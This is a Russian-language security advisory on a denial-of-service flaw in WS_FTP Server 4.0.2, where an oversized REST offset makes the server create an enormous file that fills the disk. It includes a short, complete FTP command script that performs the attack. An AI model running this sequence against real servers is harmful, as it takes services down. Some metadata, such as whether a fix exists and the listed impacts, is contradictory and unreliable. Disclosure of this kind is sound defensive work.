Отказ в обслуживании в WS_FTP Server

Дата публикации:
25.03.2004
Дата изменения:
17.10.2006
Всего просмотров:
863
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Повышение привилегий
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
WS_FTP Server 4.x
Уязвимые версии: WS_FTP Server 4.0.2

Описание: Отказ в обслуживании обнаружен в WS_FTP Server. Удаленный авторизованный пользователь с доступом на записть может заставить целевую службу использовать все доступное дисковое пространство.

Удаленный авторизованный пользователь может послать REST команду с чрезмерно длинным значением и послать маленький файл с командой STOP, чтобы создать файл на целевой системе размером 2^64-1 байт.

Пример/Эксплоит:

open ftp.server.mob
username
password
!echo.>2byte.txt
!echo.>2byte_2.txt
dir
put 2byte_2.txt
dir
del 2byte_2.txt
quote REST 1073741822
put 2byte.txt
dir
put 2byte_2.txt
del 2byte.txt
del 2byte_2.txt
!del 2byte.txt
!del 2byte_2.txt
quit

URL производителя:http://www.ipswitch.com/products/ws_ftp-server/index.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: How to crash a harddisk - the Ipswitch WS_FTP Server way

или введите имя

CAPTCHA